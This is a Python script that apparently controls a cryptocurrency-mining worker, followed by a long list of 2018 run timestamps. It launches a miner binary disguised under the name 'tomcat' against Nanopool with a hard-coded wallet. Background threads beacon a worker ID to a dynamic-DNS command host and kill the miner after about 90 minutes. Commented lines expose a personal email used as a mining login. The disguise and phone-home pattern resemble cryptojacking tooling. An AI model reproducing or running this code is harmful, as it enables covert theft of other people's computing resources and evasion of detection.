import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:15:01.733693
#2018-02-17 15:49:07.260381
#2018-02-17 17:27:01.449082
#2018-02-17 19:02:01.432870
#2018-02-17 20:35:02.969806
#2018-02-17 22:15:06.372969
#2018-02-17 23:45:07.777938
#2018-02-18 01:23:06.306089
#2018-02-18 02:54:06.445476
#2018-02-18 04:29:05.246721
#2018-02-18 06:05:06.501709
#2018-02-18 07:38:05.292518
#2018-02-18 09:08:06.464237
#2018-02-18 10:40:10.074689
#2018-02-18 12:12:07.057554
#2018-02-18 13:44:05.297259
#2018-02-18 15:22:06.184988
#2018-02-18 16:53:07.114112
#2018-02-18 18:28:01.272841
#2018-02-18 19:57:06.506272
#2018-02-18 21:31:04.377174
#2018-02-18 23:07:05.895822
#2018-02-19 00:40:07.127315
#2018-02-19 02:11:01.272400
#2018-02-19 03:46:08.137854
#2018-02-19 05:17:04.877262
#2018-02-19 06:49:04.988155
#2018-02-19 08:27:07.450083
#2018-02-19 09:59:08.222067
#2018-02-19 11:33:08.677687
#2018-02-19 13:05:01.543313
#2018-02-19 14:37:03.949656
#2018-02-19 16:11:09.589500
#2018-02-19 17:43:07.401724
#2018-02-19 19:16:04.595832
#2018-02-19 20:48:01.277712
#2018-02-19 22:23:01.599416
#2018-02-19 23:54:03.978026
#2018-02-20 01:29:07.810708
#2018-02-20 03:04:06.469533
#2018-02-20 04:37:01.816808
#2018-02-20 06:08:05.043364
#2018-02-20 07:44:06.182841
#2018-02-20 09:16:03.571626
#2018-02-20 10:47:10.531342
#2018-02-20 12:24:03.928046
#2018-02-20 13:58:08.030189
#2018-02-20 15:29:08.858611
#2018-02-20 17:10:12.450847
#2018-02-20 18:47:07.526950
#2018-02-20 20:23:04.689079
#2018-02-20 21:54:05.410867
#2018-02-20 23:23:01.893197
#2018-02-21 00:59:04.328131
#2018-02-21 02:34:01.532762
#2018-02-21 04:08:07.121764
#2018-02-21 05:43:06.972753
#2018-02-21 07:19:05.517234
#2018-02-21 08:49:03.472338
#2018-02-21 10:22:01.448933
#2018-02-21 11:58:09.131097
#2018-02-21 13:37:07.722636
#2018-02-21 15:05:03.160764
#2018-02-21 16:42:10.194823
#2018-02-21 18:18:07.389799
#2018-02-21 19:49:05.093675
#2018-02-21 21:22:02.004171
#2018-02-21 22:56:07.035343
#2018-02-22 00:32:03.872758
#2018-02-22 02:11:06.006771
#2018-02-22 03:45:08.476643
#2018-02-22 05:19:04.186898
#2018-02-22 06:48:01.851445
#2018-02-22 08:27:02.185475
#2018-02-22 10:01:02.127496
#2018-02-22 11:31:01.796480
#2018-02-22 13:04:04.442195
#2018-02-22 14:38:08.287033
#2018-02-22 16:12:01.950537
#2018-02-22 17:44:08.944368
#2018-02-22 19:18:06.176770
#2018-02-22 20:58:04.164746
#2018-02-22 22:24:01.936346
#2018-02-22 23:59:06.947760
#2018-02-23 01:35:05.247641
#2018-02-23 03:07:06.935475
#2018-02-23 04:33:07.872551
#2018-02-23 06:13:05.601062
#2018-02-23 07:47:01.362946
#2018-02-23 09:36:07.807682
#2018-02-23 11:19:06.532322
#2018-02-23 12:40:07.805244
#2018-02-23 14:04:04.933986
#2018-02-23 15:41:09.661505
#2018-02-23 17:13:07.401953
#2018-02-23 19:03:05.337092
#2018-02-23 20:38:07.333692
#2018-02-23 22:12:05.473266
#2018-02-23 23:46:07.801913
#2018-02-24 01:21:06.918964
#2018-02-24 02:56:01.383903
#2018-02-24 04:33:07.746174
#2018-02-24 06:00:10.216579
#2018-02-24 07:39:04.352463
#2018-02-24 09:14:03.443995
#2018-02-24 10:38:01.492304
#2018-02-24 12:24:08.160835
#2018-02-24 14:17:02.163610
#2018-02-24 16:03:07.520295
#2018-02-24 17:55:05.235884
#2018-02-24 19:42:07.697738
#2018-02-24 21:29:01.985042
#2018-02-25 00:13:07.103561
#2018-02-25 03:26:01.290498
#2018-02-25 07:16:01.794140